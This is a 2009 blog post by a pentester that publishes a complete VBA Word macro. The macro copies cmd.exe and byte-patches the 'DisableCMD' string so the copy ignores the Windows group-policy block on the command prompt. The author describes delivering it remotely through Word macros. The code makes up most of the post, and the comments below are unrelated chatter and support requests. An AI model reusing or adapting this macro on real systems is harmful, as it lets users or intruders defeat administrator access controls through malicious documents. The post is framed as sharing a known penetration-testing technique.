Tuesday, September 01, 2009

DisableCMD - History Repeating

Before I start. This is nothing new! Actually its known since many years (e.g. http://blog.didierstevens.com/2007/11/28/quickpost-disableamd-disableregistryfools/)

During a pentest i needed to patch cmd.exe to ignore the disablecmd policy setting. Nothing new, nothing special, but i needed to do it from remote and i had to use VBA/Word macros. Long story short, i decided to release the code, because its nothing special and the technique is well known.

Here is a short video about it:

VBA Macro to remove DisableCMD CMD.EXE restriction from Max Moser on Vimeo.

Short video showing my VBA byte patcher written to overcome DisableCMD policy setting. Sorry but i at least expected a fail safe behavior.




I am not any good in coding vba but it might save someone some time. I will add an example.doc on remote-exploit.org as well.




Sub patchcmd()
Dim Sourcefile As String, TargetFile As String, Windir As String, Tempdir As String
Dim F1 As Integer, F2 As Integer
Dim bytepattern(19) As Byte
Dim WshShell As Object

Set WshShell = CreateObject("WScript.Shell")
Windir = WshShell.ExpandEnvironmentStrings("%WinDir%")
Tempdir = WshShell.ExpandEnvironmentStrings("%temp%")

bytepattern(0) = &H44 'D
bytepattern(1) = &H0
bytepattern(2) = &H69 'i
bytepattern(3) = &H0
bytepattern(4) = &H73 's
bytepattern(5) = &H0
bytepattern(6) = &H61 'a
bytepattern(7) = &H0
bytepattern(8) = &H62 'b
bytepattern(9) = &H0
bytepattern(10) = &H6C 'l
bytepattern(11) = &H0
bytepattern(12) = &H65 'e
bytepattern(13) = &H0
bytepattern(14) = &H43 'C
bytepattern(15) = &H0
bytepattern(16) = &H4D 'M
bytepattern(17) = &H0
bytepattern(18) = &H44 'D

Dim fileoffset As Long
fileoffset = 0
Dim patternoffset As Long
patternoffset = 0
Dim gotbad As Boolean

gotbad = False

Sourcefile = Windir & "\system32\cmd.exe"
Destfile = Tempdir & "\dmc.exe"

Dim tmpbyte As Byte

If Dir(Sourcefile) = "" Then Exit Sub
FileCopy Sourcefile, Destfile
F1 = FreeFile
Open Sourcefile For Binary As F1

F2 = FreeFile
Open Destfile For Binary As F2

While Not EOF(F1)
gotbad = False

Get #F1, , tmpbyte
If tmpbyte = bytepattern(patternoffset) Then
fileoffset = (Seek(F1) - 1)

While (gotbad = False)
Get #F1, , tmpbyte
patternoffset = patternoffset + 1
If tmpbyte = bytepattern(patternoffset) Then
If patternoffset > 18 Then
'Debug.Print "Found DisableCMD and position: " & fileoffset & "Patching it now"
Put #F2, fileoffset + 6, &H34
Close F1
Close F2
MsgBox "Yeah, run it from: " & Destfile, vbOKOnly, "CMD.EXE patched"
End
End If
Else
patternoffset = 0
gotbad = True
End If
Wend
End If
Wend
Close F1
Close F2
End Sub

5 Comments:

Blogger Mehdi said...

you are pro in security MAX!

2:37 PM  
Blogger charLie.. said...

HELLO, CAN YOU HELP ME WITH BACK TRACK 4?? I CAN'TJUST THAT I CANT FIND SUPPORT, I JUST CANT CONNECT TO INTERNET IN WIRED MODE, AND MY CONNECTION IS GOOD, BECAUSE I HAVE WINDOWS TOO, AND IN IT WORKS FINE.. CAN YOU HELP ME PLEASE:d! charlystaff@hotmail.com

3:46 AM  
Blogger jhon said...

Its so highly informative things are posted in your blog. I was seeking for this type of blog only and also that you have a fresh and interesting content.
Web Conferencing

9:03 AM  
Blogger saeed_mehraban said...

I know it's irrelevant but i started using wyd 0.2 and i see this error:
Can't locate object method "init" via package "wlgmod::doc" (perhaps you forgot to load "wlgmod::doc"?) at Desktop/wyd-0.2/wyd.pl line 284.
i couldn't find anything about it on the net.
i thought maybe you can help me.

9:20 AM  
Blogger LinoCapella said...

Did you solved your problem Saeed_Mehraban.. I am having the same trouble as you did

Can't locate object method "init" via package "wlgmod::doc" (perhaps you forgot to load "wlgmod::doc"?) at ./wyd-0.2/wyd.pl line 284.

Can someone help or explain what is going wrong ?

Thanks

9:35 PM  

Post a Comment

Subscribe to Post Comments [Atom]

<< Home